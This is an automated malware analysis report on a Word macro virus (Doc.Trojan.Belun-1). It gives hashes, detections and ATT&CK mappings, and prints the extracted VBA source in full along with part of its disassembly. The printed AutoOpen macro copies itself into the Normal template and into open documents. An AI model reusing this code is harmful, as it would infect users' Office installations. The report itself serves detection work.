Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 59d8811dd2495bda…

MALICIOUS

Office (OLE)

Size: 34.5 KB | Created: 1999-05-24 14:04:00 | Authoring application: Microsoft Word 8.0 | First seen: 2012-06-14
MD5: 8d3942375321709c4eadbb9a6898da19
SHA-1: 4b5589005b6c4338f3ba9e33df1b5e04207e7b36
SHA-256: 59d8811dd2495bdad572d59edd80247a7224c8856a61e5eef008a24680145608
Risk score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing a VBA macro. Its AutoOpen subroutine calls a routine named 'IstMirSchlecht', which copies the macro module ('uebel') into the Normal template and into the active document, likely to establish persistence or evade detection. The ClamAV detection 'Doc.Trojan.Belun-1' further supports its malicious nature. The macro's logic suggests an attempt to maintain its presence across sessions.

Heuristics (4)

  • ClamAV: Doc.Trojan.Belun-1 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Belun-1
  • VBA macros detected [medium, 1 related finding] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9176 bytes
SHA-256: f92c9e11fe67ed3ae17fe4df01a44d537d39c1dbefb682346022f03062ba84e4

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "uebel"
Sub AutoOpen()
    IstMirSchlecht
End Sub
Sub IstMirSchlecht()
'On Error Resume Next
Set Norm = NormalTemplate.VBProject.VBComponents
Set Acti = ActiveDocument.VBProject.VBComponents
Const ActiveModulName = "uebel"

For i = 1 To Norm.Count
    If Norm(i).Name = ActiveModulName Then NormIns = True
    If Norm(i).Name = "Modul1" And NormIns = False Then KillSomeNormModul = True
Next

For i = 1 To Acti.Count
    If Acti(i).Name = ActiveModulName Then ActIns = True
    If Acti(i).Name = "Modul1" And ActIns = False Then KillSomeActModul = True
Next

If KillSomeNormModul = True Then
    Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:="Modul1", Object:=wdOrganizerObjectProjectItems
End If

If KillSomeActModul = True Then
    Application.OrganizerDelete Source:=ActiveDocument.FullName, Name:="Modul1", Object:=wdOrganizerObjectProjectItems
End If

If NormIns = False Then
    CheckRefNormal
    Norm.Add (vbext_ct_StdModule)
    Norm("Modul1").Name = ActiveModulName
    ActiveLines = ActiveDocument.VBProject.VBComponents(ActiveModulName).CodeModule.CountOfLines
    ActContent = ActiveDocument.VBProject.VBComponents(ActiveModulName).CodeModule.Lines(1, ActiveLines)
    Norm(ActiveModulName).CodeModule.AddFromString (ActContent)
    NormalTemplate.Save
End If
    
If ActIns = False Then
    CheckRefActive
    Acti.Add (vbext_ct_StdModule)
    Acti("Modul1").Name = ActiveModulName
    NormLines = NormalTemplate.VBProject.VBComponents(ActiveModulName).CodeModule.CountOfLines
    NormContent = NormalTemplate.VBProject.VBComponents(ActiveModulName).CodeModule.Lines(1, NormLines)
    Acti(ActiveModulName).CodeModule.AddFromString (NormContent)
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If

End Sub

Function CheckRefNormal()
CheckRefNormal = False

For i = 1 To NormalTemplate.VBProject.References.Count
    If NormalTemplate.VBProject.References(i).Name = "VBIDE" Then CheckRefNormal = True
Next

If CheckRefNormal = False Then
    NormalTemplate.VBProject.References.AddFromGuid "{0002E157-0000-0000-C000-000000000046}", 1, 0
End If

End Function

Function CheckRefActive()
CheckRefActive = False

For i = 1 To ActiveDocument.VBProject.References.Count
    If ActiveDocument.VBProject.References(i).Name = "VBIDE" Then CheckRefActive = True
Next

If CheckRefActive = False Then
    ActiveDocument.VBProject.References.AddFromGuid "{0002E157-0000-0000-C000-000000000046}", 1, 0
End If

End Function

' Processing file: /opt/analyzer/scan_staging/6347f529b1754315b9a9fde4025c806e.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1586 bytes
' Macros/VBA/uebel - 6220 bytes
' Line #0:
' 	FuncDefn (Sub AutoOpen())
' Line #1:
' 	ArgsCall IstMirSchlecht 0x0000 
' Line #2:
' 	EndSub 
' Line #3:
' 	FuncDefn (Sub IstMirSchlecht())
' Line #4:
' 	QuoteRem 0x0000 0x0014 "On Error Resume Next"
' Line #5:
' 	SetStmt 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	Set Norm 
' Line #6:
' 	SetStmt 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	Set Acti 
' Line #7:
' 	Dim (Const) 
' 	LitStr 0x0005 "uebel"
' 	VarDefn ActiveModulName
' Line #8:
' Line #9:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Norm 
' 	MemLd Count 
' 	For 
' Line #10:
' 	Ld i 
' 	ArgsLd Norm 0x0001 
' 	MemLd New 
' 	Ld ActiveModulName 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St NormIns 
' 	EndIf 
' Line #11:
' 	Ld i 
' 	ArgsLd Norm 0x0001 
' 	MemLd New 
' 	LitStr 0x0006 "Modul1"
' 	Eq 
' 	Ld NormIns 
' 	LitVarSpecial (False)
' 	Eq 
' 	And 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St KillSomeNormModul 
' 	EndIf 
' Line #12:
' 	StartForVariable
... (truncated)